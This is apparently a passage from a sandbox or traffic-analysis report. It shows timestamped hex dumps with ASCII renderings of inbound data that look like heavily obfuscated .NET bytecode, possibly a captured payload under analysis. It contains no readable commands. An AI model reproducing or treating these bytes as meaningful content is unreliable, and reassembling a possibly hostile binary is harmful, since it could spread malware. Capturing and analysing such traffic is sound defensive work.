                                                                                                                                                                                                    2022-01-14 03:59:13 UTC8INData Raw: 02 03 04 05 0e 04 0e 05 6f 30 01 00 06 13 05 38 06 00 00 00 17 80 6d 00 00 04 11 05 2a 7e 5c 00 00 04 02 03 04 05 0e 04 0e 05 6f 30 01 00 06 2a 00 00 00 0a 1b 2a 00 1b 30 02 00 12 00 00 00 00 00 00 00 17 28 2a 00 00 0a dd 06 00 00 00 26 dd 00 00 00 00 2a 00 00 01 10 00 00 00 00 00 00 0b 0b 00 06 0a 00 00 01 13 30 07 00 53 00 00 00 00 00 00 00 d0 51 00 00 01 28 23 00 00 0a 72 9d 0e 00 70 18 8d 24 00 00 01 25 16 d0 13 00 00 01 28 23 00 00 0a a2 25 17 d0 24 00 00 01 28 23 00 00 0a a2 28 6d 00 00 0a 14 18 8d 0a 00 00 01 25 16 02 8c 13 00 00 01 a2 25 17 03 a2 6f 6e 00 00 0a 74 4e 00 00 01 2a 00 1b 30 08 00 5c 68 00 00 12 00 00 11 20 eb 00 00 00 fe 0e 51 00 38 00 00 00 00 fe 0c 51 00 45 a9 02 00 00 04 09 00 00 cc 55 00 00 41 43 00 00 cf 1c 00 00 b0 23 00 00 63
                                                                                                                                                                                                    Data Ascii: o08m*~\o0**0(*&*0SQ(#rp$%(#%$(#(m%%ontN*0\h Q8QEUAC#c
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC10INData Raw: 00 c4 0f 00 00 f1 37 00 00 73 57 00 00 f4 07 00 00 9b 0d 00 00 8c 06 00 00 03 4f 00 00 aa 44 00 00 c3 2d 00 00 8d 38 00 00 7a 0e 00 00 78 3f 00 00 66 53 00 00 10 12 00 00 9e 09 00 00 0f 58 00 00 87 49 00 00 75 05 00 00 bc 20 00 00 02 14 00 00 c0 3e 00 00 24 45 00 00 f1 15 00 00 6b 42 00 00 89 3e 00 00 b3 09 00 00 0a 24 00 00 6a 58 00 00 4e 30 00 00 ae 32 00 00 6d 16 00 00 ce 41 00 00 c3 48 00 00 c2 37 00 00 32 29 00 00 a2 54 00 00 e9 3a 00 00 2a 1c 00 00 65 22 00 00 2f 47 00 00 b6 2c 00 00 40 44 00 00 3c 59 00 00 cc 27 00 00 de 49 00 00 a6 24 00 00 16 1b 00 00 11 14 00 00 1c 08 00 00 6c 37 00 00 d3 1f 00 00 7b 1b 00 00 e3 10 00 00 77 21 00 00 08 28 00 00 e7 0d 00 00 d8 24 00 00 90 12 00 00 47 4d 00 00 98 45 00 00 3b 08 00 00 81 30 00 00 37 28 00 00 2e 19
                                                                                                                                                                                                    Data Ascii: 7sWOD-8zx?fSXIu >$EkB>$jXN02mAH72)T:*e"/G,@D<Y'I$l7{w!($GME;07(.
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC11INData Raw: 87 5b 00 00 ff 15 00 00 a5 3e 00 00 0e 1f 00 00 31 3f 00 00 6d 59 00 00 7b 1a 00 00 e8 46 00 00 b9 2b 00 00 34 17 00 00 27 59 00 00 b4 36 00 00 cf 22 00 00 a0 1a 00 00 50 3f 00 00 05 51 00 00 de 58 00 00 d4 3b 00 00 13 2f 00 00 7f 28 00 00 e3 4c 00 00 8c 36 00 00 76 44 00 00 00 0c 00 00 69 43 00 00 31 21 00 00 9f 4c 00 00 08 5a 00 00 ab 13 00 00 44 51 00 00 d1 18 00 00 cf 57 00 00 49 1a 00 00 17 5b 00 00 74 17 00 00 e6 39 00 00 20 3c 00 00 c9 15 00 00 4a 48 00 00 a9 0a 00 00 cd 1b 00 00 d5 28 00 00 44 3e 00 00 8f 21 00 00 13 52 00 00 5d 44 00 00 65 3b 00 00 04 2c 00 00 ba 3f 00 00 83 07 00 00 92 1f 00 00 74 32 00 00 8f 11 00 00 7c 45 00 00 1e 11 00 00 38 ff 08 00 00 fe 0c 0a 00 20 17 00 00 00 fe 0c 40 00 9c 20 ba 01 00 00 38 3a f5 ff ff 20 99 00 00 00 20
                                                                                                                                                                                                    Data Ascii: [>1?mY{F+4'Y6"P?QX;/(L6vDiC1!LZDQWI[t9 <JH(D>!R]De;,?t2|E8 @ 8:
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC12INData Raw: 03 00 00 00 38 3c fc ff ff 11 65 28 d4 00 00 06 8d 16 00 00 01 16 28 d4 00 00 06 28 f7 00 00 06 20 00 00 00 00 28 1f 01 00 06 3a 16 fc ff ff 26 20 00 00 00 00 38 0b fc ff ff dd 4d 3a 00 00 26 20 00 00 00 00 28 1f 01 00 06 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 30 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 dd 1b 3a 00 00 20 33 00 00 00 28 1f 01 00 06 3a 5a f0 ff ff 26 20 3b 02 00 00 38 4f f0 ff ff fe 0c 05 00 20 08 00 00 00 20 7e 00 00 00 20 3a 00 00 00 59 9c 20 a3 01 00 00 28 1e 01 00 06 3a 2b f0 ff ff 26 20 23 00 00 00 38 20 f0 ff ff 12 08 e0 73 71 00 00 0a 16 28 c5 00 00 06 26 20 b8 00 00 00 38 07 f0 ff ff 11 75 11 1d 1a 58 11 07 1a 91 9c 20 96 00 00 00 28 1e 01 00 06 39 ed ef ff ff 26 20 65 01 00 00 38 e2 ef ff ff 11 45 17 58 13 45 20
                                                                                                                                                                                                    Data Ascii: 8<e((( (:& 8M:& (:& 80E8: 3(:Z& ;8O ~ :Y (:+& #8 sq(& 8uX (9& e8EXE
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC14INData Raw: 00 00 00 20 4d 00 00 00 59 fe 0e 40 00 20 92 00 00 00 38 6a eb ff ff fe 0c 0a 00 20 0c 00 00 00 fe 0c 0e 00 9c 20 ab 00 00 00 38 52 eb ff ff 11 5c 11 18 3f 98 3f 00 00 20 52 02 00 00 28 1f 01 00 06 39 3a eb ff ff 26 20 0c 02 00 00 38 2f eb ff ff fe 0c 0a 00 20 11 00 00 00 fe 0c 0e 00 9c 20 1b 01 00 00 38 17 eb ff ff 12 74 11 6f 7d 72 00 00 04 20 8b 00 00 00 38 04 eb ff ff fe 0c 0a 00 20 11 00 00 00 fe 0c 40 00 9c 20 15 02 00 00 38 ec ea ff ff 28 d4 00 00 06 1a 40 4e 05 00 00 20 33 02 00 00 28 1e 01 00 06 39 d2 ea ff ff 26 20 74 02 00 00 38 c7 ea ff ff 12 08 e0 73 71 00 00 0a 16 28 c6 00 00 06 26 20 8f 02 00 00 38 ae ea ff ff 20 96 00 00 00 20 32 00 00 00 59 fe 0e 1a 00 20 78 00 00 00 28 1f 01 00 06 3a 90 ea ff ff 26 20 8a 01 00 00 38 85 ea ff ff 11 1b 1b
                                                                                                                                                                                                    Data Ascii: MY@ 8j 8R\?? R(9:& 8/ 8to}r 8 @ 8(@N 3(9& t8sq(& 8 2Y x(:& 8
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC15INData Raw: e6 ff ff 38 b1 13 00 00 20 4e 00 00 00 38 16 e6 ff ff 7e 66 00 00 04 28 ec 00 00 06 28 ed 00 00 06 13 58 20 63 00 00 00 fe 0e 51 00 38 f3 e5 ff ff fe 0c 05 00 20 05 00 00 00 fe 0c 1a 00 9c 20 4d 01 00 00 28 1e 01 00 06 39 da e5 ff ff 26 20 66 01 00 00 38 cf e5 ff ff 20 66 00 00 00 20 03 00 00 00 58 fe 0e 0e 00 20 c7 00 00 00 38 b6 e5 ff ff fe 0c 05 00 20 0f 00 00 00 20 65 00 00 00 20 65 00 00 00 58 9c 20 87 01 00 00 fe 0e 51 00 38 8f e5 ff ff 7f 52 00 00 04 28 72 00 00 0a 28 17 01 00 06 13 35 20 69 02 00 00 38 78 e5 ff ff fe 0c 0a 00 20 1c 00 00 00 20 af 00 00 00 20 3a 00 00 00 59 9c 20 1e 00 00 00 38 59 e5 ff ff 1f 38 17 28 ce 00 00 06 28 fc 00 00 06 28 fd 00 00 06 13 50 20 01 02 00 00 fe 0e 51 00 38 33 e5 ff ff 16 13 23 20 45 01 00 00 38 2a e5 ff ff fe
                                                                                                                                                                                                    Data Ascii: 8 N8~f((X cQ8 M(9& f8 f X 8 e eX Q8R(r(5 i8x :Y 8Y8(((P Q83# E8*
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC16INData Raw: 20 02 00 00 00 fe 0c 0e 00 9c 20 35 00 00 00 28 1f 01 00 06 39 b6 e0 ff ff 26 20 02 00 00 00 38 ab e0 ff ff 20 d6 00 00 00 20 47 00 00 00 59 fe 0e 1a 00 20 41 01 00 00 38 92 e0 ff ff 11 75 11 20 17 58 11 07 17 91 9c 20 e4 01 00 00 38 7d e0 ff ff fe 0c 0a 00 20 17 00 00 00 fe 0c 40 00 9c 20 67 02 00 00 38 65 e0 ff ff 11 27 11 78 19 58 91 1f 18 62 11 27 11 78 18 58 91 1f 10 62 60 11 27 11 78 17 58 91 1e 62 60 11 27 11 78 91 60 13 00 20 4c 00 00 00 38 34 e0 ff ff 20 6f 00 00 00 20 4f 00 00 00 58 fe 0e 40 00 20 f1 01 00 00 28 1f 01 00 06 39 16 e0 ff ff 26 20 d7 00 00 00 38 0b e0 ff ff 20 10 00 00 00 20 0d 00 00 00 58 fe 0e 40 00 20 dd 00 00 00 38 f2 df ff ff 20 e7 00 00 00 20 4d 00 00 00 59 fe 0e 40 00 20 ad 00 00 00 38 d9 df ff ff fe 0c 0a 00 20 1c 00 00 00
                                                                                                                                                                                                    Data Ascii: 5(9& 8 GY A8u X 8} @ g8e'xXb'xXb`'xXb`'x` L84 o OX@ (9& 8 X@ 8 MY@ 8
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC18INData Raw: b7 00 00 00 28 1f 01 00 06 3a 68 db ff ff 26 20 60 02 00 00 38 5d db ff ff fe 0c 0a 00 20 11 00 00 00 20 aa 00 00 00 20 38 00 00 00 59 9c 20 db 01 00 00 38 3e db ff ff 11 4f 11 18 1a 5a 11 09 12 09 28 b0 00 00 06 26 20 9c 02 00 00 38 24 db ff ff 7e 4e 00 00 04 28 0c 01 00 06 13 19 20 e5 00 00 00 38 0e db ff ff 11 60 11 53 3f b1 17 00 00 20 1f 02 00 00 38 fb da ff ff fe 0c 05 00 20 0a 00 00 00 20 87 00 00 00 20 2d 00 00 00 59 9c 20 81 00 00 00 38 dc da ff ff 11 75 11 1d 1b 58 11 31 1b 91 9c 20 16 01 00 00 28 1f 01 00 06 39 c2 da ff ff 26 20 02 01 00 00 38 b7 da ff ff 16 13 6e 20 79 00 00 00 28 1f 01 00 06 3a a5 da ff ff 26 20 2f 01 00 00 38 9a da ff ff 20 9e 00 00 00 20 34 00 00 00 59 fe 0e 0e 00 20 86 02 00 00 28 1e 01 00 06 3a 7c da ff ff 26 20 e4 01 00
                                                                                                                                                                                                    Data Ascii: (:h& `8] 8Y 8>OZ(& 8$~N( 8`S? 8 -Y 8uX1 (9& 8n y(:& /8 4Y (:|&
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC19INData Raw: f4 00 00 06 25 17 28 f5 00 00 06 11 27 11 13 28 f6 00 00 06 13 3d 20 88 02 00 00 38 fd d5 ff ff fe 0c 0a 00 20 02 00 00 00 fe 0c 40 00 9c 20 52 01 00 00 38 e5 d5 ff ff 11 4c 73 76 00 00 0a 28 d4 00 00 06 1f 40 12 67 28 b0 00 00 06 26 20 59 01 00 00 38 c5 d5 ff ff 20 3e 00 00 00 20 5f 00 00 00 58 fe 0e 0e 00 20 16 00 00 00 28 1e 01 00 06 39 a7 d5 ff ff 26 20 a7 01 00 00 38 9c d5 ff ff fe 0c 05 00 20 01 00 00 00 fe 0c 1a 00 9c 20 76 02 00 00 38 84 d5 ff ff 38 04 26 00 00 20 eb 01 00 00 38 75 d5 ff ff fe 0c 05 00 20 0d 00 00 00 fe 0c 2c 00 9c 20 13 00 00 00 28 1e 01 00 06 39 58 d5 ff ff 26 20 40 01 00 00 38 4d d5 ff ff 11 23 13 23 20 f4 01 00 00 38 3f d5 ff ff 11 75 11 1d 1c 58 11 31 1c 91 9c 20 85 00 00 00 38 2a d5 ff ff fe 0c 05 00 20 00 00 00 00 20 97 00
                                                                                                                                                                                                    Data Ascii: %('(= 8 @ R8Lsv(@g(& Y8 > _X (9& 8 v88& 8u , (9X& @8M## 8?uX1 8*
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC20INData Raw: 00 00 20 47 00 00 00 59 9c 20 6b 00 00 00 38 b1 d0 ff ff 11 6d 28 f3 00 00 06 13 48 20 34 00 00 00 28 1f 01 00 06 39 99 d0 ff ff 26 20 11 00 00 00 38 8e d0 ff ff 28 d3 00 00 06 20 a5 01 00 00 38 7f d0 ff ff 11 13 1f 0d 11 58 1c 91 9c 20 14 00 00 00 28 1e 01 00 06 39 67 d0 ff ff 26 20 36 02 00 00 38 5c d0 ff ff 11 75 11 1d 18 58 11 07 18 91 9c 20 2b 00 00 00 28 1f 01 00 06 3a 42 d0 ff ff 26 20 3a 00 00 00 38 37 d0 ff ff 00 11 36 28 d7 00 00 06 28 d8 00 00 06 13 62 20 01 00 00 00 28 1f 01 00 06 39 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 4e 00 45 02 00 00 00 31 02 00 00 05 00 00 00 38 2c 02 00 00 00 38 74 00 00 00 20 02 00 00 00 38 04 00 00 00 fe 0c 2b 00 45 0a 00 00 00 39 00 00 00 09 01 00 00 89 00 00 00 d0 00 00 00 14 00 00 00 5f 00 00 00 05 00
                                                                                                                                                                                                    Data Ascii: GY k8m(H 4(9& 8( 8X (9g& 68\uX +(:B& :876((b (9& 8NE18,8t 8+E9_
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC22INData Raw: 01 00 00 00 38 b8 ff ff ff 16 13 57 20 05 00 00 00 38 ab ff ff ff 12 5d 28 72 00 00 0a 7e 6b 00 00 04 40 bc ff ff ff 20 02 00 00 00 38 90 ff ff ff 38 47 00 00 00 20 00 00 00 00 28 1f 01 00 06 3a 7c ff ff ff 26 20 00 00 00 00 38 71 ff ff ff 11 62 28 d9 00 00 06 74 52 00 00 01 28 d0 00 00 06 13 5d 20 04 00 00 00 28 1f 01 00 06 39 4f ff ff ff 26 20 00 00 00 00 38 44 ff ff ff dd 9a 00 00 00 11 62 75 55 00 00 01 13 3a 20 02 00 00 00 28 1f 01 00 06 39 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 5a 00 45 03 00 00 00 05 00 00 00 47 00 00 00 26 00 00 00 38 00 00 00 00 11 3a 28 e5 00 00 06 20 01 00 00 00 28 1f 01 00 06 3a d4 ff ff ff 26 20 01 00 00 00 38 c9 ff ff ff 11 3a 39 1a 00 00 00 20 00 00 00 00 28 1f 01 00 06 3a b3 ff ff ff 26 20 00 00 00 00 38 a8 ff
                                                                                                                                                                                                    Data Ascii: 8W 8](r~k@ 88G (:|& 8qb(tR(] (9O& 8DbuU: (9& 8ZEG&8:( (:& 8:9 (:& 8
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC23INData Raw: 00 20 bc 00 00 00 20 3e 00 00 00 59 9c 20 77 00 00 00 28 1f 01 00 06 3a f6 c5 ff ff 26 20 7d 00 00 00 38 eb c5 ff ff fe 0c 0a 00 20 0f 00 00 00 fe 0c 40 00 9c 20 aa 01 00 00 38 d3 c5 ff ff 12 08 e0 73 71 00 00 0a 16 7e 0a 00 00 0a 28 c8 00 00 06 20 55 00 00 00 38 b6 c5 ff ff fe 0c 0a 00 20 06 00 00 00 fe 0c 0e 00 9c 20 d5 00 00 00 28 1e 01 00 06 3a 99 c5 ff ff 26 20 c6 00 00 00 38 8e c5 ff ff fe 0c 05 00 20 00 00 00 00 fe 0c 2c 00 9c 20 96 00 00 00 38 76 c5 ff ff fe 0c 0a 00 20 04 00 00 00 fe 0c 0e 00 9c 20 75 01 00 00 38 5e c5 ff ff 11 4b 20 f1 f2 f3 f4 40 8d e6 ff ff 20 96 01 00 00 38 48 c5 ff ff 20 ea 00 00 00 20 4e 00 00 00 59 fe 0e 0e 00 20 93 02 00 00 38 2f c5 ff ff 20 1a 00 00 00 20 3f 00 00 00 58 fe 0e 1a 00 20 c4 00 00 00 38 16 c5 ff ff 14 13 3b
                                                                                                                                                                                                    Data Ascii: >Y w(:& }8 @ 8sq~( U8 (:& 8 , 8v u8^K @ 8H NY 8/ ?X 8;
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC24INData Raw: 00 06 11 0c 28 dd 00 00 06 28 e0 00 00 06 11 0c 28 dd 00 00 06 28 e1 00 00 06 73 78 00 00 0a 13 76 20 04 00 00 00 28 1f 01 00 06 39 23 fe ff ff 26 20 04 00 00 00 38 18 fe ff ff 11 76 11 77 28 e2 00 00 06 3a 79 fe ff ff 20 09 00 00 00 fe 0e 52 00 38 f8 fd ff ff dd df 09 00 00 11 62 75 55 00 00 01 13 3a 20 03 00 00 00 38 04 00 00 00 fe 0c 42 00 45 04 00 00 00 26 00 00 00 66 00 00 00 47 00 00 00 05 00 00 00 38 21 00 00 00 11 3a 3a 1a 00 00 00 20 00 00 00 00 28 1e 01 00 06 39 d0 ff ff ff 26 20 02 00 00 00 38 c5 ff ff ff 11 3a 28 e5 00 00 06 20 01 00 00 00 28 1f 01 00 06 39 af ff ff ff 26 20 00 00 00 00 38 a4 ff ff ff 38 1a 00 00 00 20 00 00 00 00 28 1e 01 00 06 39 90 ff ff ff 26 20 00 00 00 00 38 85 ff ff ff dc 20 b3 01 00 00 28 1f 01 00 06 3a bb bf ff ff 26
                                                                                                                                                                                                    Data Ascii: ((((sxv (9#& 8vw(:y R8buU: 8BE&fG8!:: (9& 8:( (9& 88 (9& 8 (:&
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC26INData Raw: 00 00 58 9c 20 8b 01 00 00 28 1e 01 00 06 39 4d bb ff ff 26 20 68 02 00 00 38 42 bb ff ff fe 0c 0a 00 20 0c 00 00 00 20 77 00 00 00 20 14 00 00 00 58 9c 20 be 00 00 00 28 1f 01 00 06 3a 1e bb ff ff 26 20 9d 01 00 00 38 13 bb ff ff 11 1b 17 1f 6c 9c 20 97 01 00 00 38 03 bb ff ff fe 0c 05 00 20 04 00 00 00 20 4e 00 00 00 20 18 00 00 00 59 9c 20 0e 00 00 00 28 1f 01 00 06 3a df ba ff ff 26 20 97 00 00 00 38 d4 ba ff ff fe 0c 0a 00 20 09 00 00 00 fe 0c 40 00 9c 20 cb 00 00 00 28 1f 01 00 06 39 b7 ba ff ff 26 20 7c 00 00 00 38 ac ba ff ff fe 0c 05 00 20 08 00 00 00 20 7f 00 00 00 20 2a 00 00 00 59 9c 20 32 02 00 00 38 8d ba ff ff fe 0c 0a 00 20 00 00 00 00 20 de 00 00 00 20 4a 00 00 00 59 9c 20 2c 01 00 00 38 6e ba ff ff 20 18 00 00 00 20 0f 00 00 00 59 fe 0e
                                                                                                                                                                                                    Data Ascii: X (9M& h8B w X (:& 8l 8 N Y (:& 8 @ (9& |8 *Y 28 JY ,8n Y
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC27INData Raw: fe 0c 0a 00 20 15 00 00 00 fe 0c 0e 00 9c 20 19 00 00 00 28 1e 01 00 06 39 ea b5 ff ff 26 20 15 01 00 00 38 df b5 ff ff 1f 10 13 20 20 57 02 00 00 38 d1 b5 ff ff 28 05 01 00 06 11 1b 28 06 01 00 06 13 21 20 29 01 00 00 38 b9 b5 ff ff fe 0c 05 00 20 09 00 00 00 fe 0c 1a 00 9c 20 46 01 00 00 fe 0e 51 00 38 99 b5 ff ff 20 8d 00 00 00 20 2f 00 00 00 59 fe 0e 2c 00 20 60 00 00 00 28 1f 01 00 06 39 7f b5 ff ff 26 20 25 00 00 00 38 74 b5 ff ff fe 0c 05 00 20 0e 00 00 00 20 26 00 00 00 20 15 00 00 00 59 9c 20 2e 00 00 00 38 55 b5 ff ff 20 eb 00 00 00 20 4e 00 00 00 59 fe 0e 1a 00 20 21 00 00 00 28 1f 01 00 06 3a 37 b5 ff ff 26 20 a4 00 00 00 38 2c b5 ff ff 7e 0a 00 00 0a 13 26 20 6b 00 00 00 28 1e 01 00 06 39 16 b5 ff ff 26 20 d1 00 00 00 38 0b b5 ff ff fe 0c 0a
                                                                                                                                                                                                    Data Ascii: (9& 8 W8((! )8 FQ8 /Y, `(9& %8t & Y .8U NY !(:7& 8,~& k(9& 8
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC28INData Raw: ff fe 0c 0a 00 13 27 20 a2 01 00 00 38 9d b0 ff ff 11 75 11 1d 18 58 11 31 18 91 9c 20 02 01 00 00 28 1e 01 00 06 3a 83 b0 ff ff 26 20 1c 00 00 00 38 78 b0 ff ff 20 2f 00 00 00 20 6a 00 00 00 58 fe 0e 40 00 20 6c 00 00 00 fe 0e 51 00 38 57 b0 ff ff fe 0c 05 00 20 08 00 00 00 fe 0c 1a 00 9c 20 25 00 00 00 28 1f 01 00 06 39 3e b0 ff ff 26 20 18 00 00 00 38 33 b0 ff ff 20 b7 00 00 00 20 3d 00 00 00 59 fe 0e 0e 00 20 ed 00 00 00 38 1a b0 ff ff 11 3c 1a 1e 12 09 28 b0 00 00 06 26 20 0f 01 00 00 28 1f 01 00 06 3a ff af ff ff 26 20 63 01 00 00 38 f4 af ff ff 20 61 00 00 00 20 02 00 00 00 58 fe 0e 0e 00 20 28 01 00 00 38 db af ff ff 11 75 16 11 46 11 75 8e 69 28 cc 00 00 06 20 58 02 00 00 fe 0e 51 00 38 bb af ff ff 28 d4 00 00 06 1a 3b 2a d6 ff ff 20 03 00 00 00
                                                                                                                                                                                                    Data Ascii: ' 8uX1 (:& 8x / jX@ lQ8W %(9>& 83 =Y 8<(& (:& c8 a X (8uFui( XQ8(;*
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC30INData Raw: 38 50 ab ff ff fe 0c 0a 00 20 18 00 00 00 fe 0c 40 00 9c 20 f1 00 00 00 28 1e 01 00 06 3a 33 ab ff ff 26 20 d4 00 00 00 38 28 ab ff ff 7e 4d 00 00 04 3a 22 c4 ff ff 20 ea 00 00 00 38 14 ab ff ff fe 0c 0a 00 20 03 00 00 00 fe 0c 40 00 9c 20 69 01 00 00 28 1e 01 00 06 3a f7 aa ff ff 26 20 66 01 00 00 38 ec aa ff ff 20 7d 00 00 00 20 5e 00 00 00 59 fe 0e 0e 00 20 d2 00 00 00 fe 0e 51 00 38 cb aa ff ff 2a 00 20 26 02 00 00 fe 0e 51 00 38 bb aa ff ff fe 0c 05 00 20 04 00 00 00 20 30 00 00 00 20 3e 00 00 00 58 9c 20 7a 00 00 00 38 a0 aa ff ff fe 0c 05 00 20 02 00 00 00 fe 0c 2c 00 9c 20 99 02 00 00 28 1e 01 00 06 3a 83 aa ff ff 26 20 7b 01 00 00 38 78 aa ff ff 20 00 1e 00 00 13 57 20 38 00 00 00 28 1f 01 00 06 3a 62 aa ff ff 26 20 48 00 00 00 38 57 aa ff ff fe
                                                                                                                                                                                                    Data Ascii: 8P @ (:3& 8(~M:" 8 @ i(:& f8 } ^Y Q8* &Q8 0 >X z8 , (:& {8x W 8(:b& H8W
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC31INData Raw: 00 38 04 00 00 00 fe 0c 2f 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 dd 37 02 00 00 26 20 00 00 00 00 28 1e 01 00 06 39 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 37 00 45 02 00 00 00 05 00 00 00 d9 00 00 00 38 00 00 00 00 00 11 2a 73 76 00 00 0a d0 2e 00 00 02 28 03 01 00 06 28 08 01 00 06 13 28 20 00 00 00 00 28 1e 01 00 06 39 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 61 00 45 02 00 00 00 05 00 00 00 3f 00 00 00 38 00 00 00 00 d0 2e 00 00 02 28 03 01 00 06 11 28 28 10 01 00 06 28 11 01 00 06 74 2e 00 00 02 80 5c 00 00 04 20 01 00 00 00 28 1e 01 00 06 3a bf ff ff ff 26 20 00 00 00 00 38 b4 ff ff ff dd 4c 00 00 00 26 20 00 00 00 00 28 1e 01 00 06 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 29 00 45 01 00 00 00 05 00 00 00 38
                                                                                                                                                                                                    Data Ascii: 8/E87& (9& 87E8*sv.((( (9& 8aE?8.((((t.\ (:& 8L& (:& 8)E8
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC32INData Raw: 00 28 1e 01 00 06 39 98 a0 ff ff 26 20 3a 01 00 00 38 8d a0 ff ff fe 0c 05 00 13 13 20 07 00 00 00 38 7d a0 ff ff 11 6d 28 f3 00 00 06 13 17 20 49 01 00 00 38 6a a0 ff ff 28 05 01 00 06 11 72 28 06 01 00 06 13 1e 20 14 00 00 00 28 1e 01 00 06 3a 4d a0 ff ff 26 20 08 00 00 00 38 42 a0 ff ff fe 0c 0a 00 20 11 00 00 00 20 14 00 00 00 20 76 00 00 00 58 9c 20 82 00 00 00 28 1e 01 00 06 39 1e a0 ff ff 26 20 e5 01 00 00 38 13 a0 ff ff fe 0c 0a 00 20 15 00 00 00 20 c4 00 00 00 20 41 00 00 00 59 9c 20 61 00 00 00 28 1f 01 00 06 39 ef 9f ff ff 26 20 35 00 00 00 38 e4 9f ff ff 7e 66 00 00 04 28 ef 00 00 06 16 9a 28 f0 00 00 06 13 5d 20 fc 00 00 00 38 c7 9f ff ff 20 63 00 00 00 20 6b 00 00 00 58 fe 0e 0e 00 20 74 01 00 00 28 1e 01 00 06 39 a9 9f ff ff 26 20 31 02 00
                                                                                                                                                                                                    Data Ascii: (9& :8 8}m( I8j(r( (:M& 8B vX (9& 8 AY a(9& 58~f((] 8 c kX t(9& 1
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC34INData Raw: 20 0a 00 00 00 fe 0c 40 00 9c 20 2c 01 00 00 28 1f 01 00 06 3a 89 9b ff ff 26 20 0d 02 00 00 38 7e 9b ff ff fe 0c 0a 00 20 0a 00 00 00 20 b3 00 00 00 20 3b 00 00 00 59 9c 20 3c 00 00 00 28 1f 01 00 06 39 5a 9b ff ff 26 20 2c 00 00 00 38 4f 9b ff ff 11 75 11 1d 1d 58 11 35 1d 91 9c 20 75 02 00 00 38 3a 9b ff ff 18 13 1d 20 f3 01 00 00 38 2d 9b ff ff 11 6d 28 f3 00 00 06 26 20 8f 01 00 00 38 1b 9b ff ff 7e 5c 00 00 04 28 10 01 00 06 28 19 01 00 06 28 1a 01 00 06 20 8e 01 00 00 38 fd 9a ff ff 11 21 28 ab 00 00 06 13 16 20 50 01 00 00 28 1f 01 00 06 3a e5 9a ff ff 26 20 e0 01 00 00 38 da 9a ff ff 20 b4 00 00 00 20 51 00 00 00 59 fe 0e 0e 00 20 9a 00 00 00 38 c1 9a ff ff 11 72 18 1f 74 9c 20 13 00 00 00 28 1e 01 00 06 3a ac 9a ff ff 26 20 0e 00 00 00 38 a1 9a
                                                                                                                                                                                                    Data Ascii: @ ,(:& 8~ ;Y <(9Z& ,8OuX5 u8: 8-m(& 8~\((( 8!( P(:& 8 QY 8rt (:& 8
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC35INData Raw: dd 6f 00 00 00 dd 06 00 00 00 26 dd 00 00 00 00 00 02 6f 74 00 00 0a 72 f7 0f 00 70 6f 7e 00 00 0a 02 16 8d 0a 00 00 01 6f 7f 00 00 0a 6f 75 00 00 0a 28 7a 00 00 0a 39 27 00 00 00 02 6f 74 00 00 0a 72 f7 0f 00 70 6f 7e 00 00 0a 02 16 8d 0a 00 00 01 6f 7f 00 00 0a 6f 75 00 00 0a 0a dd 11 00 00 00 dd 06 00 00 00 26 dd 00 00 00 00 72 01 00 00 70 2a 06 2a 00 01 28 00 00 00 00 00 00 2b 2b 00 06 0a 00 00 01 00 00 32 00 5d 8f 00 06 0a 00 00 01 00 00 96 00 57 ed 00 06 0a 00 00 01 13 30 05 00 4f 00 00 00 00 00 00 00 7e 59 00 00 04 3a 37 00 00 00 28 b3 00 00 06 72 09 10 00 70 28 62 00 00 0a 72 15 10 00 70 28 80 00 00 0a 28 ac 00 00 06 d0 32 00 00 02 28 23 00 00 0a 28 81 00 00 0a 74 32 00 00 02 80 59 00 00 04 7e 59 00 00 04 02 03 04 6f 41 01 00 06 2a 00 13 30 06 00
                                                                                                                                                                                                    Data Ascii: o&otrpo~oou(z9'otrpo~oou&rp**(++2]W0O~Y:7(rp(brp((2(#(t2Y~YoA*0
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC36INData Raw: 18 8d 16 00 00 01 25 16 17 9c 25 17 18 9c 2a 00 00 00 72 72 0f 11 00 70 6f 61 00 00 0a 16 26 26 18 8d 16 00 00 01 25 16 17 9c 25 17 18 9c 2a 00 00 00 72 72 43 11 00 70 6f 61 00 00 0a 16 26 26 18 8d 16 00 00 01 25 16 17 9c 25 17 18 9c 2a 00 00 00 72 72 77 11 00 70 6f 61 00 00 0a 16 26 26 18 8d 16 00 00 01 25 16 17 9c 25 17 18 9c 2a 00 00 00 13 30 02 00 02 00 00 00 18 00 00 11 14 2a 00 00 13 30 02 00 02 00 00 00 18 00 00 11 14 2a 00 00 72 72 ab 11 00 70 6f 61 00 00 0a 16 26 26 18 8d 16 00 00 01 25 16 17 9c 25 17 18 9c 2a 00 00 00 72 72 df 11 00 70 6f 61 00 00 0a 16 26 26 18 8d 16 00 00 01 25 16 17 9c 25 17 18 9c 2a 00 00 00 13 30 02 00 02 00 00 00 19 00 00 11 14 2a 00 00 13 30 02 00 02 00 00 00 19 00 00 11 14 2a 00 00 0a 17 2a 00 3e 00 fe 09 00 00 fe 09 01
                                                                                                                                                                                                    Data Ascii: %%*rrpoa&&%%*rrCpoa&&%%*rrwpoa&&%%*0*0*rrpoa&&%%*rrpoa&&%%*0*0**>
